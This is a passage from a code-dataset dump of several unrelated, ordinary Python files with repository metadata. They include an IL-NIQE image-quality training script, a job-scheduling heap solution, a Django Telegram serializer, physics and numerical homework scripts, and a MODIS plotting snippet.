Args:\r\n feature_list(list): feature to be processed.\r\n block_posi (turple): the location of 2D Image block.\r\n\r\n Returns:\r\n list: Features with length of 234.\r\n \"\"\"\r\n feat = []\r\n data = feature_list[0][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n alpha_data, beta_l_data, beta_r_data = estimate_aggd_param(data)\r\n feat.extend([alpha_data, (beta_l_data + beta_r_data) / 2])\r\n # distortions disturb the fairly regular structure of 
natural images.\r\n # This deviation can be captured by analyzing the sample distribution of\r\n # the products of pairs of adjacent coefficients computed along\r\n # horizontal, vertical and diagonal orientations.\r\n shifts = [[0, 1], [1, 0], [1, 1], [1, -1]]\r\n for i in range(len(shifts)):\r\n shifted_block = np.roll(data, shifts[i], axis=(0, 1))\r\n alpha, beta_l, beta_r = estimate_aggd_param(data * shifted_block)\r\n # Eq. 8 in NIQE\r\n mean = (beta_r - beta_l) * (gamma(2 / alpha) / gamma(1 / alpha))\r\n feat.extend([alpha, mean, beta_l, beta_r])\r\n\r\n for i in range(1,4):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n shape, scale = fitweibull(data.flatten('F'))\r\n feat.extend([scale, shape])\r\n\r\n for i in range(4,7):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n mu = np.mean(data)\r\n sigmaSquare = np.var(data.flatten('F'))\r\n feat.extend([mu, sigmaSquare])\r\n\r\n for i in range(7,85):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n alpha_data, beta_l_data, beta_r_data = estimate_aggd_param(data)\r\n feat.extend([alpha_data, (beta_l_data + beta_r_data) / 2])\r\n\r\n for i in range(85,109):\r\n data = feature_list[i][block_posi[0]:block_posi[1], block_posi[2]:block_posi[3]]\r\n shape, scale = fitweibull(data.flatten('F'))\r\n feat.extend([scale, shape])\r\n\r\n return feat\r\n\r\ndef matlab_fspecial(shape=(3,3),sigma=0.5):\r\n \"\"\"\r\n 2D gaussian mask - should give the same result as MATLAB's\r\n fspecial('gaussian',[shape],[sigma])\r\n \"\"\"\r\n m,n = [(ss-1.)/2. for ss in shape]\r\n y,x = np.ogrid[-m:m+1,-n:n+1]\r\n h = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )\r\n h[ h < np.finfo(h.dtype).eps*h.max() ] = 0\r\n sumh = h.sum()\r\n if sumh != 0:\r\n h /= sumh\r\n return h\r\n\r\ndef gauDerivative(sigma):\r\n halfLength = math.ceil(3*sigma)\r\n\r\n x, y = np.meshgrid(np.linspace(-halfLength, halfLength, 2*halfLength+1), np.linspace(-halfLength, halfLength, 2*halfLength+1))\r\n\r\n gauDerX = x*np.exp(-(x**2 + y**2)/2/sigma/sigma)\r\n gauDerY = y*np.exp(-(x**2 + y**2)/2/sigma/sigma)\r\n\r\n return gauDerX, gauDerY\r\n\r\ndef conv2(x, y, mode='same'):\r\n return np.rot90(convolve2d(np.rot90(x, 2), np.rot90(y, 2), mode=mode), 2)\r\n\r\ndef logGabors(rows, cols, minWaveLength, sigmaOnf, mult, dThetaOnSigma):\r\n nscale = 3 # Number of wavelet scales.\r\n norient = 4 # Number of filter orientations.\r\n thetaSigma = math.pi/norient/dThetaOnSigma # Calculate the standard deviation of the angular Gaussian function used to construct filters in the freq. 
plane.\r\n if cols % 2 > 0:\r\n xrange = np.linspace(-(cols-1)/2, (cols-1)/2, cols)/(cols-1)\r\n else:\r\n xrange = np.linspace(-cols/2, cols/2-1, cols)/cols\r\n\r\n if rows % 2 > 0:\r\n yrange = np.linspace(-(rows-1)/2, (rows-1)/2, rows)/(rows-1)\r\n else:\r\n yrange = np.linspace(-rows/2, rows/2-1, rows)/rows\r\n\r\n x, y = np.meshgrid(xrange, yrange)\r\n radius = np.sqrt(x**2 + y**2)\r\n theta = np.arctan2(-y,x)\r\n radius = np.fft.ifftshift(radius)\r\n theta = np.fft.ifftshift(theta)\r\n radius[0,0] = 1\r\n sintheta = np.sin(theta)\r\n costheta = np.cos(theta)\r\n\r\n logGabor = []\r\n for s in range(nscale):\r\n wavelength = minWaveLength*mult**(s)\r\n fo = 1.0/wavelength\r\n logGabor_s = np.exp((-(np.log(radius/fo))**2) / (2 * np.log(sigmaOnf)**2))\r\n logGabor_s[0,0] = 0\r\n logGabor.append(logGabor_s)\r\n\r\n spread = []\r\n for o in range(norient):\r\n angl = o*math.pi/norient\r\n ds = sintheta * np.cos(angl) - costheta * np.sin(angl)\r\n dc = costheta * np.cos(angl) + sintheta * np.sin(angl)\r\n dtheta = abs(np.arctan2(ds,dc))\r\n spread.append(np.exp((-dtheta**2) / (2 * thetaSigma**2)))\r\n\r\n filter = []\r\n for s in range(nscale):\r\n o_list=[]\r\n for o in range(norient):\r\n o_list.append(logGabor[s] * spread[o])\r\n filter.append(o_list)\r\n return filter\r\n\r\ndef train(data_path):\r\n # This function trains the pristine model\r\n # Parameters\r\n block_size_h = 84\r\n block_size_w = 84\r\n blockrowoverlap = 0\r\n blockcoloverlap = 0\r\n sh_th = 0.78\r\n sigmaForGauDerivative = 1.66\r\n KforLog = 0.00001\r\n normalizedWidth = 524\r\n minWaveLength = 2.4\r\n sigmaOnf = 0.55\r\n mult = 1.31\r\n dThetaOnSigma = 1.10\r\n scaleFactorForLoG = 0.87\r\n scaleFactorForGaussianDer = 0.28\r\n reservedRatio = 0.92\r\n sigmaForDownsample = 0.9\r\n gaussian_window = matlab_fspecial((5,5),5/6)\r\n gaussian_window = gaussian_window/np.sum(gaussian_window)\r\n\r\n trainingFiles = sorted(os.listdir(data_path))\r\n\r\n pic_features = []\r\n pic_sharpness = []\r\n\r\n for img_file in tqdm(trainingFiles):\r\n img = cv2.imread(os.path.join(data_path, img_file))\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n img = img.astype(np.float64)\r\n img = img.round()\r\n # img = cv2.resize(img, (normalizedWidth, normalizedWidth),interpolation=cv2.INTER_AREA)\r\n resize_func = MATLABLikeResize(output_shape=(normalizedWidth, normalizedWidth))\r\n img = resize_func.resize_img(img)\r\n img = np.clip(img, 0.0, 255.0)\r\n\r\n h, w, _ = img.shape\r\n\r\n num_block_h = math.floor(h / block_size_h)\r\n num_block_w = math.floor(w / block_size_w)\r\n img = img[0:num_block_h * block_size_h, 0:num_block_w * block_size_w]\r\n\r\n O1 = 0.3*img[:,:,0] + 0.04*img[:,:,1] - 0.35*img[:,:,2]\r\n O2 = 0.34*img[:,:,0] - 0.6*img[:,:,1] + 0.17*img[:,:,2]\r\n O3 = 0.06*img[:,:,0] + 0.63*img[:,:,1] + 0.27*img[:,:,2]\r\n\r\n RChannel = img[:,:,0]\r\n GChannel = img[:,:,1]\r\n BChannel = img[:,:,2]\r\n\r\n sharpness = []\r\n distparam = [] # dist param is actually the multiscale features\r\n for scale in (1, 2): # perform on two scales (1, 2)\r\n mu = convolve(O3, gaussian_window, mode='nearest')\r\n sigma = np.sqrt(np.abs(convolve(np.square(O3), gaussian_window, mode='nearest') - np.square(mu)))\r\n # normalize, as in Eq. 
1 in the paper\r\n structdis = (O3 - mu) / (sigma + 1)\r\n\r\n dx, dy = gauDerivative(sigmaForGauDerivative/(scale**scaleFactorForGaussianDer));\r\n compRes = conv2(O1, dx + 1j*dy, 'same')\r\n IxO1 = np.real(compRes)\r\n IyO1 = np.imag(compRes)\r\n GMO1 = np.sqrt(IxO1**2 + IyO1**2) + np.finfo(O1.dtype).eps\r\n\r\n compRes = conv2(O2, dx + 1j*dy, 'same')\r\n IxO2 = np.real(compRes)\r\n IyO2 = np.imag(compRes)\r\n GMO2 = np.sqrt(IxO2**2 + IyO2**2) + np.finfo(O2.dtype).eps\r\n\r\n compRes = conv2(O3, dx + 1j*dy, 'same')\r\n IxO3 = np.real(compRes)\r\n IyO3 = np.imag(compRes)\r\n GMO3 = np.sqrt(IxO3**2 + IyO3**2) + np.finfo(O3.dtype).eps\r\n\r\n logR = np.log(RChannel + KforLog)\r\n logG = np.log(GChannel + KforLog)\r\n logB = np.log(BChannel + KforLog)\r\n logRMS = logR - np.mean(logR)\r\n logGMS = logG - np.mean(logG)\r\n logBMS = logB - np.mean(logB)\r\n\r\n Intensity = (logRMS + logGMS + logBMS) / np.sqrt(3)\r\n BY = (logRMS + logGMS - 2 * logBMS) / np.sqrt(6)\r\n RG = (logRMS - logGMS) / np.sqrt(2)\r\n\r\n compositeMat = [structdis, GMO1, GMO2, GMO3, Intensity, BY, RG, IxO1, IyO1, IxO2, IyO2, IxO3, IyO3]\r\n\r\n h, w = O3.shape\r\n\r\n LGFilters = logGabors(h,w,minWaveLength/(scale**scaleFactorForLoG),sigmaOnf,mult,dThetaOnSigma)\r\n fftIm = np.fft.fft2(O3)\r\n\r\n logResponse = []\r\n partialDer = []\r\n GM = []\r\n for scaleIndex in range(3):\r\n for oriIndex in range(4):\r\n response = np.fft.ifft2(LGFilters[scaleIndex][oriIndex]*fftIm)\r\n realRes = np.real(response)\r\n imagRes = np.imag(response)\r\n\r\n compRes = conv2(realRes, dx + 1j*dy, 'same')\r\n partialXReal = np.real(compRes)\r\n partialYReal = np.imag(compRes)\r\n realGM = np.sqrt(partialXReal**2 + partialYReal**2) + np.finfo(partialXReal.dtype).eps\r\n compRes = conv2(imagRes, dx + 1j*dy, 'same')\r\n partialXImag = np.real(compRes)\r\n partialYImag = np.imag(compRes)\r\n imagGM = np.sqrt(partialXImag**2 + partialYImag**2) + np.finfo(partialXImag.dtype).eps\r\n\r\n logResponse.append(realRes)\r\n logResponse.append(imagRes)\r\n partialDer.append(partialXReal)\r\n partialDer.append(partialYReal)\r\n partialDer.append(partialXImag)\r\n partialDer.append(partialYImag)\r\n GM.append(realGM)\r\n GM.append(imagGM)\r\n\r\n compositeMat.extend(logResponse)\r\n compositeMat.extend(partialDer)\r\n compositeMat.extend(GM)\r\n\r\n feat = []\r\n for idx_w in range(num_block_w):\r\n for idx_h in range(num_block_h):\r\n # process each block\r\n block_posi = [idx_h * block_size_h // scale, (idx_h + 1) * block_size_h // scale,\r\n idx_w * block_size_w // scale, (idx_w + 1) * block_size_w // scale]\r\n feat.append(compute_feature(compositeMat, block_posi))\r\n\r\n if scale == 1:\r\n for idx_w in range(num_block_w):\r\n for idx_h in range(num_block_h):\r\n # process each block\r\n block_posi = [idx_h * block_size_h // scale, (idx_h + 1) * block_size_h // scale,\r\n idx_w * block_size_w // scale, (idx_w + 1) * block_size_w // scale]\r\n sharpness.append(compute_mean(sigma, block_posi))\r\n\r\n distparam.append(np.array(feat))\r\n gauForDS = matlab_fspecial([math.ceil(6*sigmaForDownsample), math.ceil(6*sigmaForDownsample)], sigmaForDownsample)\r\n filterResult = convolve(O1, gauForDS, mode='nearest')\r\n O1 = filterResult[0::2,0::2]\r\n filterResult = convolve(O2, gauForDS, mode='nearest')\r\n O2 = filterResult[0::2,0::2]\r\n filterResult = convolve(O3, gauForDS, mode='nearest')\r\n O3 = filterResult[0::2,0::2]\r\n\r\n filterResult = convolve(RChannel, gauForDS, mode='nearest')\r\n RChannel = filterResult[0::2,0::2]\r\n filterResult = 
convolve(GChannel, gauForDS, mode='nearest')\r\n GChannel = filterResult[0::2,0::2]\r\n filterResult = convolve(BChannel, gauForDS, mode='nearest')\r\n BChannel = filterResult[0::2,0::2]\r\n\r\n distparam = np.concatenate(distparam, axis=1)\r\n pic_features.append(np.array(distparam))\r\n pic_sharpness.append(sharpness)\r\n\r\n prisparam = None\r\n for i in range(len(pic_features)):\r\n cur_distparam = pic_features[i]\r\n cur_sharpness = pic_sharpness[i]\r\n InfIndicator = np.sum(np.isinf(cur_distparam),axis=1)\r\n InfIndicator = np.where(InfIndicator>0, 1, 0)\r\n cur_sharpness = np.array(cur_sharpness)*(1-InfIndicator)\r\n feat = cur_distparam[np.where(cur_sharpness>sh_th*np.max(cur_sharpness))]\r\n if prisparam is None:\r\n prisparam = np.array(feat)\r\n else:\r\n prisparam = np.concatenate((prisparam, feat), axis=0)\r\n\r\n dataInHighDim = prisparam.T\r\n principleVectors, meanOfSampleData, projectionOfTrainingData = MyPCA(dataInHighDim,reservedRatio)\r\n\r\n prisparam = projectionOfTrainingData.T\r\n mu_prisparam = np.nanmean(prisparam, axis=0)\r\n prisparam_no_nan = prisparam[~np.isnan(prisparam).any(axis=1)]\r\n cov_prisparam = np.cov(prisparam_no_nan, rowvar=False)\r\n\r\n templateModel = []\r\n templateModel.append(mu_prisparam)\r\n templateModel.append(cov_prisparam)\r\n templateModel.append(meanOfSampleData)\r\n templateModel.append(principleVectors)\r\n\r\n scipy.io.savemat('./python_templateModel.mat', {'templateModel':[templateModel]})\r\n\r\nif __name__ == '__main__':\r\n import warnings\r\n img_path = '../pristine/'\r\n with warnings.catch_warnings():\r\n warnings.simplefilter('ignore', category=RuntimeWarning)\r\n time_start = time.time()\r\n\r\n train(img_path)\r\n\r\n time_used = time.time() - time_start\r\n print(f'\\t time used in sec: {time_used:.4f}')\r\n","repo_name":"IceClear/IL-NIQE","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":16214,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"71757462940","text":"# 바로 이전에 작업을 완료한 시간(start)보다 크고 현재 시점(now)보다 작으면 현재 시점에서 처리할 수 있는 작업이 된다.\n# 현재 시점에서 처리할 수 있는 작업을 heap에 저장한다. \n# 이 때 소요시간을 기준으로 최소힙을 사용하기 때문에 heap을 저장할 때 [작업 소요 시간, 작업 요청 시간]으로 저장한다. \n# heap의 길이가 0보다 크다면 처리할 작업이 있는 경우이므로, 작업 요청시간부터 종료시간까지 계산하고 다음 작업으로 넘어갈 수 있도록 start와 now값을 바꿔준다. \n# heap의 길이가 0이라면 처리할 작업이 없는 경우 이므로 현재 시점을 다음 시간으로 넘어가기 위해 now에 1을 더한다. \n# 마지막으로 평균시간을 return한다. \n\n# 현재 시점에서 처리할 수 있는 작업들을 힙에 넣고, 하나를 뽑아 현재 시점과 총 대기시간을 구해주는 것을 모든 작업을 처리할 때까지 반복. \n# 힙에 push를 할 때에는 작업의 소요시간 기준으로 최소힙이 만들어져야하므로 jobs 요소의 위치를 바꿔서 넣어준다.\n# 현재 시점에서 처리할 수 있는 작업인지 판별하는 조건 : 작업의 요청시간이 바로 이전에 완료한 작업 시작 시간(start)보다 크고 현재 시점(now)보다 작아야함.\n# 만약 현재 처리할 수 있는 작업이 없다면, 남아있는 작업들의 요청시간이 아직 오지 않은 것이기 때문에 현재 시점(now)를 하나 올려준다. \nimport heapq\n\ndef solution(jobs):\n answer,now,cnt = 0,0,0 \n start = -1\n heap = []\n\n while cnt < len(jobs):\n # 현재 시점에서 처리할 수 있는 작업을 heap에 저장\n for j in jobs:\n if start < j[0] <= now:\n heapq.heappush(heap,[j[1], j[0]])\n\n # 처리할 작업이 있는 경우\n if len(heap) > 0:\n cnt += 1\n current = heapq.heappop(heap)\n start = now\n now += current[0]\n answer += (now - current[1]) # 작업 요청시간부터 종료시간까지의 시간계산\n else: # 처리할 작업 X\n now += 1 \n return int(answer/len(jobs))\n\njobs = [[0,3], [1,9], [2,6]]\nprint(solution(jobs))\n \n ","repo_name":"dhflxhdxhd/for-coding-test","sub_path":"Programmers/heap/disk.py","file_name":"disk.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15045174529","text":"from __future__ import annotations\n\nimport os\nfrom dataclasses import dataclass\nfrom pathlib import Path\n\nfrom n2t import definitions\nfrom n2t.core.hack_simulator import HackSimulator\n\n\n@dataclass\nclass Simulator:\n cycles: int\n file_name: str\n file_path: Path\n path_to_dir: str\n\n @classmethod\n def load_from(cls, file_name: str, cycles: int) -> Simulator:\n if not os.path.isabs(file_name):\n file_name = os.path.join(\n os.path.dirname(definitions.N2T_DIRECTORY),\n file_name,\n )\n file_path: Path = Path(file_name)\n file_name = file_path.stem\n path_to_dir = os.path.dirname(file_path)\n\n return cls(cycles, file_name, file_path, path_to_dir)\n\n def translate(self) -> None:\n to_simulate: list[str] = []\n\n with self.file_path.open(\"r\", newline=\"\") as file:\n for line in file:\n to_simulate.append(line)\n\n ram_output: list[str] = HackSimulator.simulate(to_simulate, self.cycles)\n\n new_path: Path = Path(os.path.join(self.path_to_dir, self.file_name + \".out\"))\n\n with new_path.open(\"w\", newline=\"\") as file:\n for current_ram in ram_output:\n file.write(f\"{current_ram}\\n\")\n","repo_name":"ZukaChilachava/HackSimulator","sub_path":"n2t/infra/simulator.py","file_name":"simulator.py","file_ext":"py","file_size_in_byte":1258,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14000943434","text":"import telegram\nfrom django.conf import settings\nfrom rest_framework.serializers import ModelSerializer, ValidationError\n\nfrom telegram_messages import models as m\nfrom users.models import User\n\nbot = telegram.Bot(token=settings.TELEGRAM_BOT_TOKEN)\n\n\nclass MessageSerializer(ModelSerializer):\n class Meta:\n model = m.Message\n fields = (\n \"text\",\n \"date_created\",\n )\n\n def create(self, validated_data):\n text: str = validated_data[\"text\"]\n user: User = validated_data[\"user\"]\n\n if user.telegram_chat_id:\n bot.send_message(\n chat_id=user.telegram_chat_id,\n text=f\"{user.name}, я получил от тебя сообщение:\\n{text}\",\n )\n\n else:\n raise ValidationError(\n {\"non_fields_error\": \"User does not have connected telegram chat\"}\n )\n\n return super().create(validated_data)\n","repo_name":"renegatemaster/factory_bot","sub_path":"factory_bot/telegram_messages/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33080591520","text":"import csv\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ROOT as rt\n\ndef mean(x, y):\n return x.dot(y)/y.sum()\n\ndef std(x, y):\n mu = mean(x, y)\n var = np.power(x, 2).dot(y)/y.sum() - mu * mu\n return np.sqrt(var)\n\nx = []\ny = []\nx_err = []\ny_err = []\n\nwith open('Mathematica.csv') as csvfile:\n spamreader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for row in spamreader:\n# print ', '.join(row)\n x.append(float(row[0]))\n x_err.append(0)\n y.append(float(row[1]))\n y_err.append( 10. )\n\n #print x,y\n width = x[1]-x[0]\n x = np.asarray(x)\n y = np.asarray(y)\n x_err = np.asarray(x_err)\n y_err = np.asarray(y_err)\n gr = rt.TGraphErrors(len(x), x, y, x_err, y_err)\n c = rt.TCanvas(\"c\", \"c\", 800, 600)\n f1 = rt.TF1(\"f1\", \"[0]+[1]*cos([2]*x+[3])\", 0, 4000)\n f1.SetParameter(0, 450.)\n f1.SetParameter(1, 400.)\n f1.SetParameter(2, 1./3000.)\n f1.SetParameter(3, 600./3000.)\n gr.Fit(\"f1\",\"REM\")\n gr.SetMarkerStyle(20)\n gr.SetMarkerColor(rt.kBlue)\n gr.SetMarkerSize(0.1)\n gr.SetLineColor(rt.kBlue)\n gr.Draw(\"AP\")\n gr.SetTitle(\"\")\n gr.GetXaxis().SetTitle(\"IM bias (adc count)\")\n gr.GetYaxis().SetTitle(\"PM output (adc count)\")\n f1.Draw(\"same\")\n\n textCMS = rt.TLatex(0.1,0.95,\"FQNET\")\n textCMS.SetNDC()\n textCMS.SetTextAlign(13)\n textCMS.SetTextFont(62)\n textCMS.SetTextSize(0.05)\n textCMS.Draw()\n\n label = \"f(x) = \"+ str(\"%.2f\"%f1.GetParameter(0)) + \" + \" + str(\"%.2f\"%f1.GetParameter(1)) + \"*Cos(\"+str(\"%.4f\"%f1.GetParameter(2))+\"*x + \"+ str(\"%.2f\"%f1.GetParameter(3)) +\")\"\n textF1 = rt.TLatex(0.4,0.8, label)\n textF1.SetNDC()\n textF1.SetTextAlign(13)\n textF1.SetTextFont(62)\n textF1.SetTextSize(0.03)\n textF1.Draw()\n\n c.SaveAs(\"tgrap.pdf\")\n\n #fig, ax = plt.subplots(figsize=(8, 6))\n #plt.bar(x,y,width)\n #plt.xlabel('time [ps]')\n #plt.ylabel('entries')\n #plt.text(0.15, 0.7, 'mu: {:.3f}'.format(mean(x, y)),\n # transform=ax.transAxes)\n #plt.text(0.15, 0.65, 'std: {:.3f}'.format(std(x, y)),\n # transform=ax.transAxes)\n #plt.savefig('dustin.png')\n #print x.dot(y)/y.sum()\n #print np.sqrt(np.power(x,2).dot(y)/y.sum() - np.power( x.dot(y)/y.sum(), 2) )\n #rint mean(x, y)\n #print std(x, y)\n\n # test on random data\n #rand_data = np.random.normal(580, 16, size=100000)\n #counts, edges = np.histogram(rand_data, bins=100)\n #centers = (edges[1:] + edges[:-1])/2.0\n #print(\"Mean and std of simulated data histogram: {:.3f}, {:.3f}\".format(\n # mean(centers, counts), std(centers, counts)))\n\n #reader = csv.DictReader(csvfile)\n #for row in reader:\n # print row\n","repo_name":"CaltechPrecisionTiming/KeysightScope","sub_path":"python/plotTGraphAndFitCos.py","file_name":"plotTGraphAndFitCos.py","file_ext":"py","file_size_in_byte":2770,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"7746314089","text":"#################################################################################\r\n# Milos Atz\r\n# NE155 Homework 6\r\n#################################################################################\r\nimport math\r\nimport numpy as np\r\nimport scipy.linalg\r\nimport math\r\n#####################################################################################################\r\n# Problem 4\r\n# Numerically solve the eigenvalue form of the diffusion equation with the same BCs as in Problem 2. Use FDM for the discretization of the spatial variable; use Power Iteration to find the dominant eigenvalue and corresponding eigenvector. Note that you may need to normalize the solution vector (should at least normalize the initial guess). Use SOR or GS method to complete the solve portion of the algorithm. Use absolute error tolerance to check for convergence.\r\n#####################################################################################################\r\n# Define the GS solver used in the problem script; this is the same as what was used in HW5.\r\ndef gs_solver(A, b, tol=1e-6):\r\n\tif(min(np.linalg.eigvals(A)<0)):\r\n\t\tsys.exit('A is not positive definite')\r\n\tif((A.transpose() != A).all()):\r\n\t\tsys.exit('A is not symmetric')\r\n\tif(b.size!=A.shape[0] or b.size!=A.shape[1]):\r\n\t\tsys.exit('dimensions of A and b do not agree')\r\n\tn=b.size\r\n\tx_old=np.transpose(np.matrix(np.zeros(n)))\r\n\tD=np.diag(np.diag(A))\r\n\tL=np.diag(np.diag(A,-1),-1)\r\n\tU=np.diag(np.diag(A,1),1)\r\n\tDL_inv=np.linalg.inv(D+L)\r\n\tconv=1\r\n\tcounter=0\r\n\twhile(conv>tol):\r\n\t\tx_new=DL_inv*(-U*x_old+b)\r\n\t\t# print(x_new)\r\n\t\tconv=np.linalg.norm(x_new-x_old)\r\n\t\tx_old=x_new\r\n\t\tcounter=counter+1\r\n\t# print('counter= '+str(counter))\r\n\t# print('absolute error = '+str(conv))\r\n\treturn(x_new)\r\n#####################################################################################################\r\na = 4.0\t\t\t# cm\r\nD = 1.0\t\t\t# cm\r\nsig_a = 0.7\t\t# 1/cm\r\nvsig_f = 0.6\t#1/cm\r\nh = 0.1\t\t\t# cm\r\n#####################################################################################################\r\n# First, we determine the number of cells and points.\r\nn_cell = int((a-(-1*a))/h)\r\nn_points = n_cell+1\r\n#####################################################################################################\r\n# We need initial values for k(0) and phi(0) for i=0,...,n-1; we normalize phi0 = phi0/norm(phi0). Let's assume that k(0)=1 and phi(0)=1 for i=0,...,n-1.\r\nk = 0.98\r\nphi = np.transpose(np.matrix(np.ones(n_cell-1)))\r\nphi = phi/np.linalg.norm(phi)\r\n#####################################################################################################\r\n# We compute A in the same way as done for Problem 2. A is made up out of the coefficients for flux; A is a tridiagonal matrix. The inputs a, b, and c allow for the input of those coefficients.\r\nA_a = [-1]*int(n_cell-2)\r\nA_b = [2+(sig_a*h**2/D)]*int(n_cell-1)\r\nA_c = [-1]*int(n_cell-2)\r\nA = np.matrix(np.diag(A_a, -1)+np.diag(A_b, 0)+np.diag(A_c, 1))\r\n#####################################################################################################\r\n# The initial fission source is calculated as nu*sig_F_i,i*phi(0)_i. 
nu*sig_F is constant, so we just multiply that by the initial guess for phi.\r\nQ = (h**2*vsig_f/D)*phi\r\n#####################################################################################################\r\n# In order to iterate until convergence, we set up a convergence criterion, defined by the error of the solution relative to our desired tolerance. We have two criteria to set up - one for the eigenvector (phi) and one for the eigenvalue (k). The absolute error will be calculated as k(n)-k(n-1) and ||Ax-b|| for phi.\r\nerror_k = 1\r\nerror_phi = 1\r\ntol = 1e-4\r\ncounter = 0\r\n#####################################################################################################\r\n# Within the while loop, we will iterate to solve A*phi = (1/k)*Q using the GS method, which has it's own iteration loop.\r\nwhile(error_k > tol or error_phi > tol):\r\n\tcounter = counter+1\r\n\tb = (1/k)*Q\r\n\t# Use the GS solver to solve for phi(m)\r\n\tphi_new = gs_solver(A,b)\r\n\t# Compute the next fission source\r\n\tQ_new = (h**2*vsig_f/D)*phi_new\r\n\t# Compute the next eigenvalue\r\n\tk_new = k*sum(Q_new)/sum(Q)\r\n\t# Check for convergence\r\n\terror_k = abs(k_new-k)\r\n\terror_phi = np.linalg.norm(phi_new-phi)\r\n\tk=float(k_new)\r\n\t# print(k)\r\n\tphi=phi_new\r\n\tQ=Q_new\r\nprint('k = '+str(k))\r\nprint('number of power iterations = '+str(counter))\r\nprint('error in phi = '+str(float(error_phi)))\r\nprint('error in k = '+str(float(error_k)))\r\nphi=np.transpose(np.insert(phi, 0, 0.0))\r\nphi=np.transpose(np.insert(phi, n_points-1, 0.0))\r\n#####################################################################################################\r\n# Plot the eigenvector, phi, from x = -a to a, Report the eigenvalue, k, and the number of power iterations required for convergence.\r\nimport matplotlib.pyplot as plt\r\nx_vals=[0]*n_points\r\nfor i in range(0,n_points):\r\n\tx_vals[i]=-1*a+h*i\r\nx_vals=np.transpose(np.matrix(x_vals))\r\nfig=plt.plot(x_vals, phi, 'rx', label='finite difference')\r\nplt.xlim([-a-0.5,a+0.5])\r\nplt.ylabel('phi(x)')\r\nplt.xlabel('x')\r\nplt.figtext(0.14, 0.86, 'k = '+str(round(k,5)))\r\nplt.figtext(0.14, 0.82, 'power iterations = '+str(counter))\r\nplt.figtext(0.14, 0.78, 'error in phi = '+str(round(float(error_phi),9)))\r\nplt.figtext(0.14, 0.74, 'error in k = '+str(round(float(error_k),9)))\r\n#plt.show()\r\nplt.savefig('p4_flux.png', bbox_inches='tight')\r\nplt.clf()\r\n\r\n\r\n","repo_name":"MilosAtz/NE155","sub_path":"HW6/P4.py","file_name":"P4.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"8333541022","text":"# Mohammad Mishal S. Noroña | BSCPE 1-5 | Assignment #7\n# Creata a Class for USer's Input\nclass UserInput:\n # Number Input Function\n def num_input(self):\n while True:\n try:\n num = float(input(\"Enter a number:\"))\n return num\n except ValueError:\n print(\"\\nInvalid Input\")\n print(\"Enter a Numerical Value\\n\")\n continue\n # Operation Input Function\n def operation_input(self):\n print(\"\\nList Of Operation \\n\")\n print(\"[a] Add\")\n print(\"[s] Subtract\")\n print(\"[m] Multiply\")\n print(\"[d] Divide\")\n print(\"[p] Percent\")\n print(\"[e] Exponent\")\n\n operation = input(\"\\nEnter an Operation [a/s/m/d/p/e]: \")\n return operation\n # Ask user for another input\n def try_again(self):\n more_input = input(\"\\nDo you want to Enter another? (y/n): \")\n return more_input","repo_name":"KaninWithRice/Class-Calculator","sub_path":"Class_User_Input.py","file_name":"Class_User_Input.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"14012007405","text":"from django.contrib import admin\nfrom . import models\n# admin.site.register(models.Profil)\n\n\n@admin.register(models.Profil)\nclass ProfilAdmin(admin.ModelAdmin):\n list_display = (\"id\", \"name\")\n search_fields = ('name',)\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.SocialLink)\nclass SocialLinkAdmin(admin.ModelAdmin):\n list_display = ('id', 'name')\n search_fields = ('name', \"url\")\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.Post)\nclass PostAdmin(admin.ModelAdmin):\n list_display = (\"title\",)\n search_fields = (\"title\",)\n list_filter = ('created_at', 'update_at')\n\n\n@admin.register(models.About)\nclass AboutAdmin(admin.ModelAdmin):\n list_filter = ('created_at', 'update_at')\n\n","repo_name":"diamond1516/My_Blog_Web","sub_path":"app/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29233896833","text":"import datetime as dt # Python standard library datetime module\nimport numpy as np\nfrom pyhdf import SD\nfrom mpl_toolkits.basemap import Basemap\nimport matplotlib.pyplot as plt\n\nf = SD.SD('Data/modis_test.hdf')\n#view datasets\ndatasets_dic = f.datasets()\n\n\nlat=f.select('Latitude')\nlon=f.select('Longitude')\nlon=lon.get()\nlat=lat.get()\n\n\nsds_obj = f.select('Cloud_Fraction_Nadir_Day') # select sds\n\ndata = sds_obj.get()*0.01 # get sds data\n\n#for key, value in sds_obj.attributes().items():\n # print (key, value)\n # if key == 'add_offset':\n # add_offset = value \n # if key == 'scale_factor':\n # scale_factor = value\n\n#data = (data - add_offset) * scale_factor\n\n\n\n#print (data)\n \n#data_av = np.mean(data, axis=0) \nplt.figure()\nplt.contourf(lon, lat, data)\n\nlat_bins=np.arange(-25,-5,0.5)\nlat_hist=np.digitize(lat,bins=lat_bins)\nlist1=[]\nfor i in range(len(lat_bins)):\n location=lat_hist==i\n cf_lat=data[location]\n nw_data=np.nanmean(cf_lat[(cf_lat<1.0)&(cf_lat>-0.01)])\n 